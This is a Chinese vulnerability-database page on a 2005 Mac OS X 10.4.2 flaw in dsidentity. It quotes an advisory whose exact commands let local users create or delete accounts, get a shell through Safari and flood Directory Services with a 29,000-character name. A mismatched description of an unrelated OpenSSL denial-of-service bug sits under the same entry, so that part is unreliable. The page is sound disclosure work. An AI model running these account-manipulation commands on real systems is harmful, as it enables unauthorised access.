发布时间 :2005-08-19 00:00:00
修订时间 :2008-09-05 16:51:56

[原文]dsidentity in Directory Services in Mac OS X 10.4.2 allows local users to add or remove user accounts.

[CNNVD]OpenSSL SSL握手NULL指针拒绝服务攻击漏洞(CNNVD-200508-212)

        OpenSSL在处理SSL/TLS握手实现时存在问题,远程攻击者可以利用这个漏洞使OpenSSL崩溃。使用Codenomicon TLS测试工具,OpenSSL发现在do_change_cipher_spec()函数中存在一个NULL指针分配。远程攻击者可以构建特殊的SSL/TLS握手,发送给使用OpenSSL库的服务器,可导致OpenSSL崩溃,依赖此库的应用程序会产生拒绝服务。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.4.2Apple Mac OS X 10.4.2
cpe:/o:apple:mac_os_x_server:10.4.2Apple Mac OS X Server 10.4.2

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(PATCH)  APPLE  APPLE-SA-2005-08-15
(PATCH)  APPLE  APPLE-SA-2005-08-17

- 漏洞信息

OpenSSL SSL握手NULL指针拒绝服务攻击漏洞
中危 设计错误
2005-08-19 00:00:00 2005-10-20 00:00:00
        OpenSSL在处理SSL/TLS握手实现时存在问题,远程攻击者可以利用这个漏洞使OpenSSL崩溃。使用Codenomicon TLS测试工具,OpenSSL发现在do_change_cipher_spec()函数中存在一个NULL指针分配。远程攻击者可以构建特殊的SSL/TLS握手,发送给使用OpenSSL库的服务器,可导致OpenSSL崩溃,依赖此库的应用程序会产生拒绝服务。

- 公告与补丁


- 漏洞信息 (F39552)

DMA-2005-0818a.txt (PacketStormID:F39552)
2005-08-24 00:00:00
Kevin Finisterre

dsidentity on Apple OS X 10.4 allows any user on the system to add accounts to Directory Services.

DMA[2005-0818a] - 'Apple OSX dsidentity privilege abuse'
Author: Kevin Finisterre
Product: 'Mac OSX 10.4'

After roughly one hour of beating on the freshly released OSX 10.4 I found that /usr/sbin/dsidentity 
allows any user on the system to add accounts to Directory Services. Passwords can easily be set at 
the time of account creation, and the newly created account can be used to login to the OSX gui. Due 
to the lack of shell the account is limited in nature, however once you have logged into the gui 
accessing a shell is trivial. 

To add an account simply use the following command line and then you can now login as RickJames with the 
password isapimp. 

CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -a RickJames -s isapimp -v

After logging in as RickJames open Safari and type file:///bin in the address bar. Double click on bash. 
Ignore the warning about not being authorized, and then click cancel when asked to close the application. 
Voila Now you have a working bash shell as RickJames.

To remove an account from Directory Services use the following. 
CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -r CharlieMurphy -v

If you rally want to piss off someone's Directory Services try the following. 
CrunkJuice:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`
(lather, rinse, repeat) 

Work Around: 
Install 2005-007 update or just rm -rf /usr/sbin/dsidentity

Neil Archibald of Suresec LTD also reported this issue to apple at the same time I did. outlines extra detail about this issue with 
regard to the use of getenv() calls. 

Timeline associated with this bug: 
05/25/2005 reported to apple. 
05/26/2005 followup to auto ticketing system #9116351
08/03/2005 AppleSeeds!
08/17/2005 Security Update 2005-007 v1.1 

- 漏洞信息 (F39545)

adv5.pdf (PacketStormID:F39545)
2005-08-24 00:00:00
Ilja van Sprundel,Neil Archibald

Traceroute and ping suffer from buffer overflows and a user spoofing vulnerability exists in Mac OS X versions up to 10.3.9 and 10.4.2.

- 漏洞信息

Apple Mac OS X Directory Services dsidentity Arbitrary Account Manipulation
Local Access Required Other
Loss of Integrity
Exploit Unknown

- 漏洞描述

Mac OS X contains serveral flaws that may allow a malicious user to gain access to unauthorized privileges. The issue is caused by several flaws within the dsidentity tool, and may allow non-administrative users to manipulate accounts within Directory Services. This flaw may lead to a loss of integrity.

- 时间线

2005-08-17 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X dsidentity Directory Services Account Creation and Deletion Vulnerability
Design Error 14630
No Yes
2005-08-15 12:00:00 2009-07-12 05:06:00
Discovery is credited to Neil Archibald and Kevin Finisterre.

- 受影响的程序版本

Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4

- 漏洞讨论

A vulnerability in Apple Directory Services allows unprivileged users to create or delete directory services idnetity accounts.

This issue was originally described in BID 14567 Apple Mac OS X Multiple Vulnerabilities. It is now being assigned its own BID.

- 漏洞利用

An exploit is not required.

The following examples were provided:
To create an account named 'Username' with the password 'pass':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a Username -s pass -v

To delete an account named 'Username':
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -r Username -v

To create multiple accounts:
Victim:~ kevinfinisterre$ /usr/sbin/dsidentity -a `perl -e 'print "A" x 29000'`

- 解决方案

Apple has released fixes to address this and other vulnerabilities:

Apple Mac OS X 10.4.2

Apple Mac OS X Server 10.4.2

- 相关参考